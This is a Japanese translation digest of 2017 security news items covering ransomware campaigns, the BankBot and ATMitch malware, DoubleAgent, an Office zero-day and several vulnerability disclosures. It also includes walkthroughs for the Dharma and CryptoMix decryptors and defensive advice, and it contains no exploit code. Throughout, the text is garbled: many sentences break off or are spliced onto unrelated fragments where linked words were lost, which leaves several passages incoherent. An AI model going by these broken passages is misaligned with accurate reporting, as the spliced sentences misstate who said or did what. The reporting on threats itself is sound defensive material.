 殆ど同時に、Webrootアンチウィルスは、Facebookをフィッシングサイトとしてタグ打ちし、このソーシャルネットワークへのアクセスをブロックした。回答 し始めた。
現在、殆どの問題は修正された 
 それであるにも拘わらず、この企業のフォーラムへの投稿によると、Webrootのテクニカル チームは素早く動き、昨晩遅くにFacebook問題を解決する修正をリリースした。指示 を提供している。二ヶ月前 、Webrootのアップデートは、彼等のクライアントの一部のコンピュータに問題を発生させクラッシュさせている。
 【訳注】 原文は、この後Twitterの引用が続きますが、公開された画像のみ紹介し、それ以外は省略します。
PDF中に隠されていたWordドキュメントに身代金要求型マルウェアが隠れていた  Sophos : NakedSecurity (2017/04/24) Locky の変種であるように思われる。
最新の戦術はどのようなものなのか? 
 一般的なパターンに従うと、この最新の身代金要求型マルウェアは、PDF添付ファイルの付いたeMailスパムとして出現する。
 このPDFは、内部にドキュメントが付属しており、Acrobat Readerで開かれようとする。
 このドキュメントがMS Word中に開かれると、ソーシャル・エンジニアリング攻撃を通して編集を有効にするように要求してくる。
 これは、Crypto身代金要求型マルウェアをダウンロードし実行するVBAマクロを実行する
何をすべきか? 
 この種の攻撃からより適切に身を守るために人々が実行できることがある。
・ 定期的にバックアップし、最新のバックアップをオフサイト(【訳注】 PC本体やインターネットに接続していない場所)に保持しなさい:  ファイルが突然消滅するのは身代金要求型マルウェア以外にも多くの方法がある(火事、洪水、ラップトップを落とした、誤って削除した)。バックアップを暗号化しなさい。これで、バックアップ デバイスが悪者の手に渡っても何の心配もする必要はない。eMailを介して受け取ったドキュメント添付ファイル中のマクロを有効にするな:  Microsoftは、数年前からセキュリティ基準として、慎重にDefaultでマクロの自動実行をOFFにしている。多くのマルウェア感染は、あなたを説得し、あなたがマクロをONに戻すことを当てにしているので、これを実行してはならない。頼みもしないのに送ってきた添付ファイルには注意を払う:  間違いなくあなたが望んでいるドキュメントであると分かるまで、そのドキュメントを開くべきではないが、開けてみなければ望んでいるドキュメントか否か分からないというジレンマを、犯罪者は当てにしている。疑わしきは、無視せよ。サッサとパッチせよ、頻繁にパッチせよ:  ドキュメント マクロを介して出現しないマルウェアは、しばしば、人気のあるアプリケーション(Office、ブラウザ、Flash等)のセキュリティ バグに依存している。速やかにパッチすればするほど、犯罪者が悪用するために残存するセキュリティ ホールは少なくなる。この攻撃に関しては、ユーザは、PDFとWordの最新のアップデートを適用したバージョンを使用していることを確実なものにしておきたい。Sophos Intercept X (【訳注】 有料)を使用する: 
 Sophosは、このPDFを Troj/PDFDoc-C として、ペイロードを Troj/Locky-UP として検出する。
 役に立つと思われる他のリンク
低価格のランサムウェア(身代金要求型マルウェア)サービスが発見された  Kaspersky : ThreatPost (2017/04/18) 
 Recorded Futureは、このマルウェアは3月4日に、ロシア語を話せるDevBitoxもしくはDereck1と名乗るサイバー犯罪者によってアンダーグラウンド フォーラムで RaaSとして販売されていたと発言している。「さらなる調査で、ロシア語を話すサイバー犯罪者DevBitoxが、Karmenマルウェアの背後にいる販売者であることが判明した」と、Recorded Futureの研究者Diana GrangerとAndrei Barysevich(火曜日に公開された、この身代金要求型マルウェアに関するレポートの著者 )は記述している。立て続けに派生物 を呼び起こした。
 研究者によると、Karmen感染の最初のケースは、ドイツ及びアメリカ在住の犠牲者によって2016年12月に報告されている。Karmenは、AES-256暗号化を使用して感染したPCのファイルを暗号化する。NoMoreRansom.org上で利用可能な無料ツール で削除することができるが、「現時点で、感染したマシンを、この無料復号プログラムで復号する方法は、利用できない」と、研究者は発言している。
 【訳注】 以下はBleepingComputerのKarmenに関する記事からの引用
IOCs: 
 joise.exe(Karmen)のVirusTotalでの検出結果はコチラ 。検出率 43/61、解析日時: 2017/04/18 15:29:35(協定世界時。日本時間: 2017/04/19 00:29:35)。
GoogleはBankBotトロイと戦っている最中、マルウェアはPlay Storeに到達した  BleepingComputer : News>Security (2017/04/17) 地下のオンライン ハッキング フォーラムにリークされた 2017年01月に遡る。
BankBotはGoogleセキュリティ スキャンを回避する能力を持っている 
 BankBotはリークされたソースコードに基づいているものの、このマルウェアの作者はコードベースを改悪し、Google Bouncerセキュリティ スキャナを欺くに足る偽装能力をこのマルウェアに追加した。3つの異なるBankBotキャンペーン を検出した。
先週検出された更なる二つのキャンペーン 
 4月に至ってもなお、これらのキャンペーンは依然としてアクティブである。BankBotは最初に、ロシアのサイバーセキュリティ企業Dr.Webによって検出され、一連のキャンペーンはESETによって検出された。オランダの企業Securifyもまた、二つの新しいBankBotキャンペーンを同定した(二つのアプリケーションがBouncerをバイパスしPlay Storeに到達する)。Funny Videos 2017 と名付けられていたものであり、先週、削除されたが、それまでに1000から5000ダウンロードされていた。HappyTimes Videos )は、イースター(【訳注】 復活祭、今年は4月16日)の間に発見され、この記事がリリースされる前に削除された。
先週検出された更なる二つのキャンペーン 
 セキュリティの専門家によると、二つのアプリケーションは、BankBotトロイの最新のバージョンに感染させられていた。この名前が仄めかしているように、BankBotはAndroidバンキング トロイである。殆どのAndroidバンキング トロイと同様に、BankBotは、そのユーザの正当なバンキング アプリケーションの上にインチキのログイン ウィンドウを表示する。
BankBotによって正当なログインウィンドウに重ねて表示されるインチキのログインウィンドウの一部
 実際には、BankBotはバンキング アプリケーション以外の機能も持っているのでログイン認証を盗むことができる。今迄のバージョンは、Facebook, Viber, Youtube, WhatsApp, Uber, Snapchat, WeChat, IMO, Instagram, Twitter, Google Play Storeのようなアプリケーションに関するログインの詳細を盗むことが可能になっていた。
Play Store URLコード(画像をクリックすると拡大されます)
aib.ibank.android
Microsoftは、Windows 7 と 8.1 が稼働している新しいCPU搭載モデルに対するアップデートを停止している  BleepingComputer : News>Security (2017/04/14) 
Microsoftは昨年PC所有者に警告していた 
 Microsoftは、2016年01月 、03月 、08月 に、その意図をアナウンスしていた。Microsoftはこの変更に関して特定の期限を決してアナウンスしなかった。そして、Microsfotがサポートトピックを2017年03月 にオンラインに上げた場合でさえ、この期限はアナウンスされなかったので、今月の定例パッチは、多くのPC所有者に驚きを与えることになった。
Your PC uses a processor that is designed for the latest version of Windows. Because the processor is not supported together with the Windows version that you are currently using, your system will miss the important security updates.
あなたのPCはWindowsの最新バージョン用に設計されたプロセッサを使用している。このプロセッサと、あなたが現在使用中のWindowsバージョンとの組み合わせはサポートされない。あなたのシステムは重要なセキュリティ アップデートを取得できない。
【訳注】 Microsoftの日本語サイトに、この部分の和訳を見つけることができませんでしたので、対訳しておきます。
 今月のアップデートから、Windows 7 と 8.1 ユーザはWindowsアップデートをスキャンしたりダウンロードしようとした時、以下のエラーの一つを受け取るだろう。
サポートされていないハードウェア
お使いの PC はこのバージョンの Windows でサポートされていないプロセッサを使用しています。更新プログラムは利用できません。(Microsoft日本語サイトより引用)
もしくは、
新しい更新プログラムを検索できませんでした
このコンピューターで利用できる新しい更新プログラムを確認中にエラーが発生しました。
エラー:
コード 80240037 Windows Update で不明なエラーが発生しました。(Microsoft日本語サイトより引用)
 以下の第7世代のCPUモデルの所有者が影響を受けることが知られている。
・ Intel 第 7 世代プロセッサ(Intel Core ix 7xxx) 
 
 このことは、Microsoftが、Windows 7 と Windows 8.1 に関して全ての古いCPUモデルをサポートすることを意味していない。これは、Micorosoftが現在、Skylakeとして知られるIntel第6世代プロセッサをサポートする予定の16のOEMベンダ (リンクは日本語サイトに変更しています)をリストしているからである。
AdobeとMicrosoftから緊急のセキュリティ アップデート  Krebs On Security : Blog (2017/04/12) セキュリティ更新プログラムガイド 」に置き換えたことである。特定のアップデートを選択的にダウンロードすることからホームユーザを締め出す ために、一つの大きなパッチの塊として全ての定例アップデートをリリースするという変更の余波に密接に関連している。主張 にも拘わらず、多くのユーザは、新しいフォーマットに多分ウンザリしているだろう(今迄の規定の下より、より多くのクリックと検索を要求されるようである)。どのような場合であれ、Microsoftは、何が変更されたのか、人々が新しい取り決めの下で何を期待できるのかを説明するために、FAQ をリリースしてきた。Dridexバンキング トロイを拡散する ように設計された攻撃で表面化したMicrosoft Word中の弱点を含む)。Flash Playerの緊急のアップデート は、少なくとも7つのフローを修正している。新しいバージョンは、Windows、Mac、Linux用は、v. 25.0.0.148 である。このページ をチェックしなさい。A Month Without Adobe Flash Player をチェックしなさい。Flashホームページ から利用可能である。Internet Explorer以外のブラウザでWebをブラウズしているWindowsユーザは、このパッチを夫々のブラウザで適用する必要がある。IEで一回、使用している他のブラウザでも夫々。Reader / Acrobatアップデート は、これらの製品中の大変多くの47のセキュリティ ホールを解決している。あなたが、これらのプログラムの何れかをインストールしているのであれば、アップデートの時間を取りなさい。
 
アニメ ファンをターゲットにしたRensenwareは、復号に熱狂的な挑戦を要求する  Bitdefender : Hot For Security (2017/04/11) 要求する 。そして、このマルウェアの製作者でさえ自分のコンピュータが感染した時に、クリアすることができないであろう2億ポイント("lunatic"レベル)という常軌を逸したスコアに到達することだけを要求してくる。謝罪 は続けて、「しかしながら、配布の時点で、悲劇は始まっていた。一部の人々が私を非難した。尤もなことだ。私は明らかな間違いを犯した。この謝罪が、皆さんにとって十分なものか否か分からない。十分なものでなければ、私はまた謝罪する。害を及ぼそうとしたわけではない。私は、皆さんが、このことを理解してくれることを希望する。」
新しいOfficeへの0-Day攻撃が検出された  BleepingComputer : News>Security (2017/04/08) McAfee とFireEye が、インターネット上の新たなMicrosoft Officeへの0-Day攻撃を公開した。この0-Dayの脆弱性は、攻撃者がターゲットのマシンにコッソリとコードを実行しマルウェアをインストールすることを可能にするものである。
Office保護ビューは、この攻撃を阻止する 
 この0-Dayへの攻撃は単純なシナリオに従い、敵が犠牲者にMicrosoft WordドキュメントをeMailすることで始まる。このWordドキュメントは、ブービートラップされたOLE2linkオブジェクトを含んでいる。Office保護ビュー (リンクは日本語サイトに変更してあります)を使用していたなら、この脆弱性攻撃は無効になり、絶対に実行されない。ユーザが保護ビューを無効にしていた場合には、この脆弱性攻撃は自動的に実行され、RTFを装ったHTA(HTMLアプリケーション、【訳注】 外観はHTML、内部処理はVBScriptあるいはJavaScriptで実装する(It Proより))ファイルをダウンロードする場所から、攻撃者のサーバーに対してHTTPリクエストを実行する。
この0-Dayは、全てのWindowsとOfficeのバージョンに影響を与える 
 McAfeeの専門家は、この脆弱性が、全てのWindowsオペレーティング システム上の全ての現在のOfficeバージョンに影響を与えると発言している。
ATMから現金を吐き出させる自己削除型マルウェア  BleepingComputer : News>Security (2017/04/04) 
ハッカーはATMシステムの制御を取得した銀行を晒した 
 これらの攻撃に関する更なる手掛かりが、やっと最近になって明るみに出た。Kaspersky Labのセキュリティ研究者(今年二月 の第一次攻撃を同定した人々)は、彼等が銀行をハッキングした目的の一部を明らかにしたと確信している。
画像をクリックすると拡大表示されます。
 St. Maarten(【訳注】 セントマーチン島、カリブ海にある島)で近頃開催されたSecurity Analyst Summit (SAS)でのプレゼンで、Kaspersky Labの研究者は、犯罪者が、様々な悪用(彼等が正当なWindowsツールとシステムの程近くに彼等のアクセスを拡大するためのPowerShellマルウェアを使用する場所)を使用して様々な銀行のネットワークに侵入したと発言している。
ATMitchマルウェアはATMに現金を吐き出させる 
 このマルウェアは命令用の command.txt ローカルファイルを読むことによって動作する。命令は、command.txt ファイルの内部に存在している一文字の単純なものである。
'O' - Open dispenser
 攻撃者が特定のATMの前に仲間がいることを認識すると、彼等は command.txt ファイルに命令をアップロードする。そして、このマルウェアは、命令を実行し、現金を吐き出させるだろう。ログ エントリに基き、このATMが "Catch some money, bitch!" という言葉を、その画面上に表示したと、研究者は確信している。
襲われるATMを見つけ出すことは殆ど不可能 
 このマルウェアは攻撃が終了すると自分自身を削除し、ファイルの全てを処分するので、攻撃者が、このテクニックを使用して、どのくらいの数のATMを空にしたのかは分かっていない。
LastPassに未だ修正されていない未公開の重大な脆弱性  GrahamCluley : News (2017/03/30) ツイート した。アンチウィルス製品中に多くのフローを発見してきた Ormandyは、(今回 )脆弱性攻撃がどのように動作するのかを公に発表しないことによってResponsible Disclosureの倫理に固執した。セキュリティホール を修正してきたこのパスワード マネージャは、Ormandyの公表を公に認めるために二日間を要した。彼等は、この悪用の詳細に関しては何も発表していない。
 「我々は現在、積極的にこの脆弱性を解決中である。この攻撃は、一意であり極めて高度である。我々は、この脆弱性に関する具体的なことや、高度ではない邪悪な団体に対して何らかのことを明らかにすることになるであろう我々の修正を公開しようとは思わない。そこで、この作業が終了するまで、あなたは自己分析の詳細を得ることはできないだろう。」
 ベンダが、Responsible Disclosureを介して彼等のセキュリティを改善するために支援する研究者に感謝しているのを見るのは常に嬉しいことである。全ての企業が、このように丁寧に対応しているわけではない。一部の企業は、彼等が最善を尽くすことが、誠実な方法でセキュリティを進歩させるとして研究者を締め出している 。他のセキュリティ上の脆弱性がパッチされた 数日後に、このセキュリティホールだけが通知されたことを心に描いてみよう。
 一つ目、ユーザは、ブラウザ拡張からではなく、LastPassの金庫室から直接サイトを起動するように促している(LastPassのスマートフォン アプリケーション バージョンは影響を受けないと考えられている)。
アンチ-ウィルス ソフトウェアをハイジャックするためにMicrosoftのアプリケーション ベリファイアを使用する新しい攻撃  BleepingComputer : News>Security (2017/03/17) 
DoubleAgent攻撃で改竄されたNortonアンチウィルス ユーザ インターフェース
 Cybellumの研究者によって発見されDoubleAgentと名付けられた新しいテクニックは、攻撃者がセキュリティ製品をハイジャックし、それらに悪意ある行動を取るようにすることを可能にするものである。
DoubleAgent攻撃はMicrosoftのアプリケーション ベリファイアを悪用している 
 Microsoftアプリケーション ベリファイア は、開発者がランタイムにコードのエラーを検証するためのツールである。このツールは、全てのWindowsのバージョンに搭載されており、開発者がチェックしたいアプリケーション内部でDLLをロードすることによって動作する。
Avast (CVE-2017-5567) 
 
 「我々は90日以上前に全てのベンダに対してDoubleAgentについて通告し、そして、幾つかのベンダと共同作業した」と、Michael Engstler(CybellumのCTO)は、Bleeping Computerへのメール中で発言している。
DoubleAgentはセキュリティ製品をマルウェアに変える 
 DoubleAgent攻撃は、セキュリティ製品をハイジャックし、効果的に無効化するので、極めて危険である。攻撃者のスキル レベルに応じて、攻撃者は、悪意あるコードをロードするために、以下のようにしてDoubleAgentフローを使用している。
・ セキュリティ製品をOFFにする 
 
 計画的に、DobuleAgent攻撃は、コード挿入テクニックと永続的メカニズムの両方である。これは、レジストリキーのおかげで、攻撃者がブート毎にターゲットプロセスに悪意あるDLLを再挿入することが可能なためである。
DoubleAgent攻撃は全てのソフトウェアに影響を与える 
 Cybellumチームが、アンチウィルス ソフトウェアに関する研究に焦点をあてていたとしても、DoubleAgentをセキュリティ製品のみへの脅威として考えてはならない。GitHub で利用可能である。この攻撃を詳細に説明しているブログ ポスト(一般的な、そして、テクニカル レベル)は、明日(3月22日)、公開されるだろう。コチラのYouTubeビデオ (DoubleAgent Zero-Day Attacking Norton Antivirus)は、活動しているDoubleAgent攻撃を示している。Protected Processes は、Microsoftがアンチ-マルウェア サービス用に特別に設計したセキュリティシステムである。そして、Protected Processesは、アンチ-マルウェアのプロセスをラッピングし、他のアプリケーションに未署名のコードが挿入されることを許可しないように動作する。
Ask.comツールバー ネットワークが二ヶ月で二回セキュリティ侵害されていた  BleepingComputer : News>Security (2017/03/17) 最初の攻撃 は、2016年10月の終わりと11月の初めに発生し、Red Canaryのセキュリティ研究者達によって発見された。2回目は12月に発生した。これは、APNがネットワークをクリーンにし、Carbon Blackセキュリティ製品で増強した後のことであった。
攻撃者は、Ask.comツールバー アップデート プロセスをハイジャックしていた 
 最初の攻撃では、サイバー犯罪者は、悪意あるプロセスを生み出すためにPNGファイルを使用したアップデートパッケージをダウンロードしインストールするためにAsk.comツールバー アップデート プロセスを改竄した。
二回目の攻撃は犠牲者のPCにRATをインストールした 
 Carbon Blackの研究者達は、攻撃者が、何らかの方法で、この新しいデジタル証明書を手に入れ、二回目の悪意あるアップデートプロセスに署名するために、それを使用したと発言している。Carbon Blackは発言している 。この全ては、悪意あるアップデートが配布された後、60秒で発生していた。
新たな攻撃は検出されていない 
 この二回目の攻撃で使用されたRATは、最初の攻撃の後に発行されたAPN認証で署名されていた。これは十中八九、最初の攻撃の後にエンジニアがサーバーをクリーンにした後も、攻撃者がAPNネットワーク上に足掛かりを維持していたことを意味している。
3ダース余りの様々なAndroidデバイスにプレインストールされたマルウェアが発見された  GrahamCluley : News (2017/03/13) 
Galaxy A5 
 
 スマートフォンやコンピュータのような電子デバイス ベンダは、ROMに格納したデータと共に製品を出荷している。ROM(read-only memoryの頭文字)は、電源がOFFの場合でさえデータを維持するストレージ媒体である。従って、BIOS(basic input and output instructions)やファームウェア アップデートのような重要な情報を保管するために使用される。ブログ ポストで、この点を詳細に述べている 。
 「この悪意あるソフトウェアは、ベンダによって提供される公式のROMの一部ではなく、流通過程の何処かで追加されたものである。このマルウェアの内の6つは、悪意に満ちた役割を持つ者によってシステム権限を使用してデバイスのROMに追加されている。これは、ユーザによって削除することができず、デバイスのROMを焼き直す必要があることを意味している」
 では、プレインストールされたマルウェアは何を実行するのか?マルウェアのプレインストール は今に始まったことではない ので、ユーザはそれに対して自分自身を保護するために、あらゆることを実行することができる。
Western DigtalのNASハードドライブに複数の未パッチの脆弱性が発見された  BleepingComputer : News>Security (2017/03/02) 
影響を受ける複数のMyCloudモデル 
 Zenofexによると、影響を受ける複数のWD MyCloud NASデバイス モデルは以下である。
My Cloud 
 
 ZenofexがWestern Digitalに通知しないことの決定は、他のインフォセック専門家達が、報告された脆弱性をWestern Digitalが無視していることに不平不満をぶつけた、昨年のセキュリティ カンファレンスに、この研究者が出席した後のことである。Pwnie Award (【訳注】 オニー賞、セキュリティ分野などの不名誉を表彰するジョーク的な賞。2011年にはSONYが受賞)を受賞している。決定した論拠 としている。
発見された85のセキュリティ フロー 
 Exploitee.rsコミュニティのメンバーであるZenofexは、とてつもなく大きな全部で85のセキュリティ ホールを発見したと発言している。概念の証明コードは、Exploitee.rs Wiki で、これらの脆弱性の48に関して利用可能である。nuit によるTweetはコチラ 。これ が、Zenofexによって記録された、活動中の幾つかのセキュリティフローを示したビデオである。
サードパーティのベンダがWindows GDI脆弱性用の臨時のパッチをリリースした  BleepingComputer : News>Security (2017/03/02) Microsoftがパッチしないまま放置 している脆弱性に関して、サードパーティのセキュリティ ベンダACROS Securityが臨時のパッチをリリースした。CVE-2017-0038 で追跡されるこの脆弱性は、Windows GDIライブラリ中のバグである。これは、ビデオ ディスプレイとローカル プリンタにデータが送信されている時の両方で、Windowsがグラフィックスとフォーマットされたテキストを処理するために使用するライブラリである。
この問題はMicrosoftが2月の定例パッチを延期したので未パッチのまま残されている 
 この問題は、昨年Microsoftに通知され、2016年06月にパッチ(MS16-074)されたという事実がある。このパッチをテストしたJurczykは、彼の当初のレポートで、通知した問題を完全に修正することに、このパッチは失敗していたので、昨年11月、Microsoftに対して、この問題を改めて提示したと発言していた。03月15日にスケジュールされている )まで遅延した後に出現している。
ACROS Securityは、臨時のパッチを配布している 
 その間に、ACROS Securityは、0patch(0-Day、未パッチの脆弱性、期限切れ、サポートされていない製品、時代に合わなくなったOS、脆弱性のあるサードパーティー コンポーネント、カスタマイズされたソフトウェアに修正を適用するためのプラットフォーム)と呼ばれる製品を経由してWindowsコンピュータに適用することのできる臨時のパッチを発行した。0patch Agentクライアント を介して無料で適用される。このパッチは閲覧可能でありコチラからダウンロード (直リンク)することができる。付け加えている 。
https://youtu.be/LWx3mERvgdo 
 Windows GDI問題とは別に、Google Project Zeroの研究者達は、二つ目の未パッチのMicrosoftの脆弱性の詳細を公開した。この問題は、EdgeとInternet Explorerに影響を与える。 
Kasperskyが、Dharma身代金要求型マルウェア用の復号プログラムをリリース  BleepingComputer : News>Security (2017/03/02) Dharma身代金要求型マルウェア用のマスター復号キー と主張するものが BleepingComputer.com のフォーラムに投稿されたことを記述した。これはCrysis(Dharmaはこれに基づく)用のキー がリリースされたのと同じ方法で実行された。Dharma Ransomware Help & Support Topic で質問しなさい。アップデート 2017/03/02、午前10:08(米国東部時間) コチラ 。
RakhniDecriptorを使用してDharmaで暗号化されたファイルを復号する方法 
 Dharma身代金要求型マルウェアの犠牲者は、彼等のファイルが暗号化され、[filename].[email_address].dharma のフォーマットにリネームされていることで、Dharma身代金要求型マルウェアの犠牲者であることを特定できる。例えば、最近の変種は、ファイル名 test.jpg を test.jpg.[tombit@india.com].dharma にリネームし暗号化する。暗号化されたファイルの例は、以下に見られる。
Dharmaで暗号化されたファイル
 今までに確認された他の変種の一部は、以下を含んでいる。
.[3angle@india.com].dharma
 Dharma身代金要求型マルウェアで暗号化されたファイルを復号するには、RakhniDecryptor をダウンロードする (直リンク)必要がある。ダウンロードしたら、このプログラムを解凍し、実行する。この復号プログラムが起動すると、以下に示すメイン スクリーンが表示される。
RakhniDecryptor
 始める前に、あなたが必ずバージョン 1.17.17.0 を使用していることを保証しなさい。このバージョンが、Dharma身代金要求型マルウェアをサポートしている。RakhniDecryptorのバージョンを確認するには、上の画面の左下にある About ボタンをクリックしなさい。これは RakhniDecryptorのバージョンを示す小さなウィンドウを表示する。
バージョンを表示する About 画面
 あなたがバージョン 1.17.17.0以降を使用しているのであれば、Start scanボタンをクリックしなさい。そうすると、RakhniDecryptorは、暗号化されたファイルを選択するように促してくる。Dharmaで暗号化されたファイルを含むフォルダに移動し、.Word, Excel, PDF, music, imageファイルを選択しなさい。テキスト ファイルは残りのファイルを復号するために使用することができないので選択しないようにしなさい。
Dharmaで暗号化されたファイルを選択する
 ファイルを選択したら、Openボタンをクリックする。これで、RakhniDecryptorは、暗号化されたファイルに関してコンピュータ全体をスキャンし、それらを復号する。
Dharmaで暗号化されたファイルをスキャン中
 このプロセスには、かなりの時間がかかるので、この復号プログラムが、あなたのコンピュータをスキャンし、ファイルを復号するまで辛抱しなさい。
復号完了
 ここで、この復号プログラムで復号されたDharmaファイルの完全なリストを確認するために、detailsリンク(上図のProcessed行の右端)をクリックしなさい。
スキャン結果のページ
 ここで、RakhniDecryptorを終了する。あなたは再びファイルにアクセスできるはずである。
復号されたファイルが存在するフォルダ
 バックアップされている暗号化されたファイルを掃除するには、この暗号化されたファイルを、アーカイブもしくは削除しても差し支えない別のフォルダに移動するためにCryptoSearch を使用しなさい。
100万を超えるWebサイトがWordPress Galleryプラグインのフローのリスクがある  The State Of Security : News (2017/03/02) WordPress Webサイト で大変人気のあるプラグインであり、1650万回ダウンロードされている。深刻なSQL挿入の脆弱性 があることを明らかにした。
 この脆弱性は、少なくとも二つのシナリオで攻撃者が悪用することができる。
 ・ あなたのサイトで NextGEN Basic TagCloud Gallery を使用している場合、もしくは、 
 これらのケースの何れかに該当する場合、あなたは明らかにリスクがある。
 この問題は、NextGEN Galleryが、SQLクエリーを用意しているWordPressでサニタイズされた(【訳注】 入力されたデータの危険な部分を無力化する操作)ユーザ インプットを不適切に許可しているために存在していた。これは、基本的に、生のSQLクエリー内部にユーザインプットを追加することと同じである。この攻撃ベクトルを使用して、攻撃者は、ハッシュされたパスワードや、或る形態のWordPress秘密鍵をリークすることが可能になる。
 幸いなことに、このセキュリティの脆弱性は、このプラグインのバージョン2.1.79でパッチされている。もちろん、
Imagely(NextGEN Galleryプラグインの開発者)が、修正したバージョンをリリースしたからといって、この話が終わるわけではない。チェンジログ に記述されている緊急のセキュリティ上の脆弱性の修正は、参照されていない。
 あなたは、このフローに関して触れられていることと、修正がリリースされている事実を発見するには、このプラグインのサポートフォーラムを掘り下げる 必要がある。
100ヶ国以上1500の企業が、悪意あるAdwindバックドアRATで攻撃されている  Graham Cluley : News (2017/02/28) 45万人を超える個人 (Mac愛好者を含む)をターゲットにしてきた多機能型バックドア)が、企業を餌食にすることを好きになったことを示唆している。
ターゲットにされている産業別Top 10
 この攻撃は、企業がHSBC(【訳注】 英国を本拠とする世界最大級のメガバンク)のようなところからeMailを受け取ることで始まる。このeMailは、2013年以来アクティブである mail.hsbcnet.hsbc.com ドメインから出発している。このメッセージには、付属の添付ファイルは受領者用の支払い通知を含んでいると記されている。以下のように説明している。 。
 「通知の代わりに、この添付ファイルはマルウェアのサンプルを含んでいる。ターゲットにされたユーザが添付されているZIPファイル(この中にRARファイルが含まれている)を開くと、このマルウェアは、自己インストールし、そのコマンド&コントロール サーバと通信しようとする。このマルウェアは、攻撃者が、セキュリティ侵害されたデバイスの制御をほぼ完全に獲得し、感染したコンピュータから秘密情報を盗むことを可能にする。」
 (誤解のないように言うと、このZIPファイルそれ自体を開いても何ら傷つけられることはないが、このZIPアーカイブに含まれるJARファイルを開くと、コンピュータは感染する。)
ターゲットにされている国別Top 10
 これまでは、マレーシアを本拠とする団体が、この攻撃の矛先で傷つけられた。しかし、英国、ドイツ、レバノン、その他の国々も遅れをとっていない
Googleが、Microsoft EdgeとIEの未パッチの脆弱性を公開した  BleepingComputer : News>Security (2017/02/24) Windows GDIコンポーネント中のバグ の詳細を公開した後、Microsoftの製品中の第二の未パッチの脆弱性に関する詳細を公開した。今回は、EdgeとInternet Explorerに関するものである。
EdgeとIEに影響を与えるType Confusion問題 
 GoogleのProject Zeroの研究者Ivan Fratricによって発見されたこのバグは、CVE-2017-0037識別子によって追跡される。この問題は、攻撃者が影響を受けているマシンでコードを実行したり、デバイスを乗っ取ることを可能にする種類のセキュリティフローであるType Confusion(【訳注】 データ型を誤って処理することで発生する問題)である。Googleのバグレポート で利用可能である。PoCコードは、この脆弱性の残っているブラウザをクラッシュさせるが、攻撃者の能力水準に応じて、より危険な悪用が構築されるだろう。
2月の定例パッチのキャンセルと、その因果関係 
 Microsoftが今月の定例のアップデートで、このバグへのパッチを予定していたか否かは不明である。SMBファイル共有プロトコル である。3月の定例パッチ (3月15日に予定されている)で、2月の定例パッチもリリースする予定であると発言している。幾つかのセキュリティアップデートを出荷 している。
Avastが、CryptoMix身代金要求型マルウェアの復号プログラム(オフライン バージョン)をリリースした  BleepingComputer : News>Security (2017/02/23) 復号プログラムをリリース した。オフラインモードは、インターネットに接続していない、あるいは、そのコンピュータが、この身代金要求型マルウェアのコマンド&コントロール サーバに接続できていない間に、この身代金要求型マルウェアが稼働し犠牲者のコンピュータを暗号化するものである。CryptoMix Help & Support Topic  で気楽に質問しなさい。
Avastの復号プログラムを使用して、オフラインで暗号化されたCryptoMixファイルを復号する方法 
 オフラインCryptoMix暗号化で暗号化されたファイルを復号するには、ユーザは暗号化されたファイルと、それと同一の暗号化されていないファイルの両方のバージョンを持っていなければならない。暗号化されたファイルと一致する暗号化されていないファイルを見つけるには、 C:\Users\Public\Pictures\Sample Pictures のサンプル ピクチャ フォルダを使用するように提案する。このフォルダの画像は、大抵は暗号化されるが、その暗号化されていないバージョンは、簡単に他のコンピュータからダウンロードすることができる。http://rumkin.com/tools/cipher/rot13.php  に進み、暗号化されたファイルのファイル名を入力しなさい(但し、.CRYPTOSHIELD拡張子は外す)。例えば、暗号化されたファイルが、 CRATHVAF.WCT.CRYPTOSHIELD と名付けられているのであれば、 そのWebサイトでは、CRATHVAF.WCT とだけ入力しなさい。ファイル名を入力したら、このWebサイトは自動的に、そのファイルを復号するので、あなたは、以下に示したようにオリジナルのファイル名を確認できる。
ファイル名を復号中のROT-13D(画像はクリックすると拡大します)
 上の画像で見られるように、この復号されたファイル名はPenguins.jpgである。これで、我々は、暗号化されたファイルのオリジナルのファイル名を認識したので、他のコンピュータから暗号化されていないバージョンを、Decryptフォルダ(【訳注】 このフォルダは、デスクトップに先に作成しておく)中にコピーすることができる。
Decryptフォルダ
 我々はファイルのペアを持ったので、復号プロセスを開始することができる。Avast WebサイトからCryptoMix復号プログラムをダウンロードするには、以下のリンクを使用し、デスクトップに保存する。
Avast CryptoMix復号プログラム(直リンク) 
 ファイルをダウンロードしたら、ダブルクリックして、avast_decryptor_cryptomix.exe を実行する。このプログラムが起動すると、以下に示す、この復号プログラムのメイン画面が表示される。
CryptoMix復号プログラム
 ここでは、Next> ボタンをクリックする。これで、復号したいドライブの選択を要求する画面が表示される。 以下に示す画面で、あなたが復号したい各ドライブやフォルダを追加しなさい。
復号場所の選択
 復号したい場所の全てを選択したら、Next> ボタンをクリックする。これで、暗号化されたファイルと暗号化されていないファイルのペアを選択するように要請される。我々は、このペアのファイルをデスクトップのDecryptフォルダに置いてある。
暗号化されたファイルと暗号化されていないファイルのペアを追加する
 上の画像の各フィールドで、フィールドの右にある … の付いた矩形のボタンをクリックし、デスクトップのDecryptフォルダから適切なファイルを選択する。我々が暗号化されたファイルと、それと同一の暗号化されていないファイルを選択したら、Next> ボタンをクリックする。これで、以下に示すファイルのキーの検索を要請する画面が表示される。
パスワードをクラックする画面
 準備が整ったので、Startボタンをクリックする。復号プログラムは、多くの既知の復号キーであなたのファイルをチェックする。復号キーが発見されると、以下類似の画面が表示される。
CryptoMix復号パスワードが発見された
 ここで、Next> ボタンをクリックすると、あなたが選択できる幾つかの復号オプションの付いた画面が表示される。
復号オプション
 上の画像に示してあるように、二つのオプションの両方を有効にするように提案する。あなたが、どのオプションを有効にするのか決定したら、CryptoMixで暗号化されたファイルの復号を開始するために、Decryptボタンをクリックしなさい。この復号プロセスには、かなり時間が掛かる。我慢しなさい。
CryptoMixで暗号化されたファイルを復号中
 復号が終了すると、以下のような画像が表示される。
復号終了
 これで復号は完了したので、この復号プログラムを終了しなさい。
復号できる暗号化されたオフライン ファイル拡張子 
.CRYPTOSHIELD
Microsoftが定例のパッチを遅延した後、GoogleがWindowsのバグを公開した  BleepingComputer : News>Security (2017/02/18) 
このバグは、2016年06月不完全に修正されていた 
 GoogleのProject Zeroチームのバグ レポート によれば、このバグは当初、2016年06月に発見された問題の大規模なコレクション の一部であった。そして、2016年07月に、Microsoftのセキュリティ ブレティンMS-16-074で修正された。
これは初めてのことではない 
 Googleが、Microsoftにこのステップを採ったのは2016年11月(Microsoftが11月のパッチをリリースする数日前にATP28(Strontium、ストロンチウム)として知られるサイバースパイ集団によって悪用された0-Day攻撃に関する詳細の公開 )以来二回目である。失望した 」と発言していた。
